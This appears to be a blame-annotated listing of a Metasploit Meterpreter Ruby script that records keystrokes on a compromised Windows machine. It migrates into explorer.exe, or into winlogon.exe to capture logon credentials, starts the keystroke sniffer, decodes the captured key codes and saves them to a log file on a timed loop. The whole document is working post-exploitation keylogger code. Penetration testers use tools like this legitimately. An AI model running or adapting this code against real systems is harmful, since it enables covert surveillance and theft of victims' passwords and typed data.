2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2010-06-23 00:50:14 +00:00
|
|
|
# $Revision$
|
|
|
|
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
|
|
|
|
#-------------------------------------------------------------------------------
|
2009-03-24 03:21:57 +00:00
|
|
|
session = client
|
2009-10-26 05:26:08 +00:00
|
|
|
# Script Options
|
|
|
|
@@exec_opts = Rex::Parser::Arguments.new(
|
|
|
|
"-h" => [ false, "Help menu." ],
|
|
|
|
"-t" => [ true, "Time interval in seconds between recollection of keystrokes, default 30 seconds." ],
|
|
|
|
"-c" => [ true, "Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0." ]
|
|
|
|
)
|
|
|
|
def usage
|
|
|
|
print_line("Keylogger Recorder Meterpreter Script")
|
|
|
|
print_line("This script will start the Meterpreter Keylogger and save all keys")
|
2010-04-24 15:13:26 +00:00
|
|
|
print_line("in a log file for later anlysis. To stop capture hit Ctrl-C")
|
2009-10-26 05:26:08 +00:00
|
|
|
print_line("Usage:" + @@exec_opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
|
2009-03-24 03:21:57 +00:00
|
|
|
|
|
|
|
#Get Hostname
|
|
|
|
host,port = session.tunnel_peer.split(':')
|
|
|
|
|
|
|
|
# Create Filename info to be appended to downloaded files
|
|
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
|
|
|
|
|
|
|
# Create a directory for the logs
|
2010-06-23 00:50:14 +00:00
|
|
|
logs = ::File.join(Msf::Config.log_directory, 'scripts', 'keylogrecorder')
|
2009-03-24 03:21:57 +00:00
|
|
|
|
|
|
|
# Create the log directory
|
|
|
|
::FileUtils.mkdir_p(logs)
|
|
|
|
|
|
|
|
#logfile name
|
2010-04-24 15:13:26 +00:00
|
|
|
logfile = logs + ::File::Separator + host + filenameinfo + ".txt"
|
2009-03-24 03:21:57 +00:00
|
|
|
|
|
|
|
#Interval for collecting Keystrokes in seconds
|
|
|
|
keytime = 30
|
|
|
|
|
|
|
|
#Type of capture
|
|
|
|
captype = 0
|
|
|
|
|
|
|
|
#Function to Migrate in to Explorer process to be able to interact with desktop
|
2009-05-15 04:24:20 +00:00
|
|
|
def explrmigrate(session,captype)
|
2009-03-24 03:21:57 +00:00
|
|
|
begin
|
|
|
|
if captype.to_i == 0
|
|
|
|
process2mig = "explorer.exe"
|
|
|
|
elsif captype.to_i == 1
|
2009-03-25 03:13:54 +00:00
|
|
|
process2mig = "winlogon.exe"
|
2009-03-24 03:21:57 +00:00
|
|
|
else
|
|
|
|
process2mig = "explorer.exe"
|
|
|
|
end
|
|
|
|
# Actual migration
|
2009-10-26 05:26:08 +00:00
|
|
|
mypid = session.sys.process.getpid
|
2009-03-24 03:21:57 +00:00
|
|
|
session.sys.process.get_processes().each do |x|
|
2009-10-26 05:26:08 +00:00
|
|
|
if (process2mig.index(x['name'].downcase) and x['pid'] != mypid)
|
|
|
|
print_status("\t#{process2mig} Process found, migrating into #{x['pid']}")
|
2009-03-24 03:21:57 +00:00
|
|
|
session.core.migrate(x['pid'].to_i)
|
|
|
|
print_status("Migration Successful!!")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return true
|
|
|
|
rescue
|
2009-03-25 00:08:42 +00:00
|
|
|
print_status("Failed to migrate process!")
|
2009-03-24 03:21:57 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#Function for starting the keylogger
|
|
|
|
def startkeylogger(session)
|
|
|
|
begin
|
2009-05-15 04:24:20 +00:00
|
|
|
#print_status("Grabbing Desktop Keyboard Input...")
|
|
|
|
#session.ui.grab_desktop
|
2009-03-24 03:21:57 +00:00
|
|
|
print_status("Starting the keystroke sniffer...")
|
2009-03-25 03:13:54 +00:00
|
|
|
session.ui.keyscan_start
|
2009-03-24 03:21:57 +00:00
|
|
|
return true
|
|
|
|
rescue
|
2009-03-25 00:08:42 +00:00
|
|
|
print_status("Failed to start Keylogging!")
|
2009-03-24 03:21:57 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#Funtion for Collecting Capture
|
|
|
|
def keycap(session, keytime, logfile)
|
|
|
|
begin
|
2009-10-26 05:26:08 +00:00
|
|
|
rec = 1
|
2009-03-24 03:21:57 +00:00
|
|
|
#Creating DB for captured keystrokes
|
|
|
|
print_status("Keystrokes being saved in to #{logfile}")
|
2009-10-26 05:26:08 +00:00
|
|
|
#Inserting keystrokes every number of seconds specified
|
2010-06-23 00:50:14 +00:00
|
|
|
print_status("Recording ")
|
2009-10-26 05:26:08 +00:00
|
|
|
while rec == 1
|
|
|
|
#getting Keystrokes
|
|
|
|
data = session.ui.keyscan_dump
|
|
|
|
outp = ""
|
|
|
|
data.unpack("n*").each do |inp|
|
|
|
|
fl = (inp & 0xff00) >> 8
|
|
|
|
vk = (inp & 0xff)
|
|
|
|
kc = VirtualKeyCodes[vk]
|
2009-03-24 03:21:57 +00:00
|
|
|
|
2009-10-26 05:26:08 +00:00
|
|
|
f_shift = fl & (1<<1)
|
|
|
|
f_ctrl = fl & (1<<2)
|
|
|
|
f_alt = fl & (1<<3)
|
|
|
|
|
|
|
|
if(kc)
|
|
|
|
name = ((f_shift != 0 and kc.length > 1) ? kc[1] : kc[0])
|
|
|
|
case name
|
|
|
|
when /^.$/
|
|
|
|
outp << name
|
|
|
|
when /shift|click/i
|
|
|
|
when 'Space'
|
|
|
|
outp << " "
|
|
|
|
else
|
|
|
|
outp << " <#{name}> "
|
|
|
|
end
|
|
|
|
else
|
|
|
|
outp << " <0x%.2x> " % vk
|
|
|
|
end
|
2009-03-24 03:21:57 +00:00
|
|
|
end
|
2009-10-26 05:26:08 +00:00
|
|
|
sleep(2)
|
2010-06-23 00:50:14 +00:00
|
|
|
file_local_write(logfile,"#{outp}\n")
|
2009-10-26 05:26:08 +00:00
|
|
|
sleep(keytime.to_i)
|
|
|
|
end
|
|
|
|
db.close
|
2009-03-24 03:21:57 +00:00
|
|
|
rescue::Exception => e
|
2009-10-26 05:26:08 +00:00
|
|
|
print("\n")
|
2009-03-25 03:13:54 +00:00
|
|
|
print_status("#{e.class} #{e}")
|
2009-10-26 05:26:08 +00:00
|
|
|
print_status("Stopping keystroke sniffer...")
|
2009-03-25 03:13:54 +00:00
|
|
|
session.ui.keyscan_stop
|
2009-03-24 03:21:57 +00:00
|
|
|
end
|
|
|
|
end
|
2009-10-26 05:26:08 +00:00
|
|
|
|
2009-03-24 03:21:57 +00:00
|
|
|
# Parsing of Options
|
|
|
|
helpcall = 0
|
|
|
|
@@exec_opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
2009-10-26 05:26:08 +00:00
|
|
|
when "-t"
|
|
|
|
keytime = val
|
|
|
|
when "-c"
|
|
|
|
captype = val
|
|
|
|
when "-h"
|
|
|
|
usage
|
|
|
|
end
|
2009-03-24 03:21:57 +00:00
|
|
|
}
|
2009-10-26 05:26:08 +00:00
|
|
|
if explrmigrate(session,captype)
|
|
|
|
if startkeylogger(session)
|
|
|
|
keycap(session, keytime, logfile)
|
2009-03-24 03:21:57 +00:00
|
|
|
end
|
|
|
|
end
|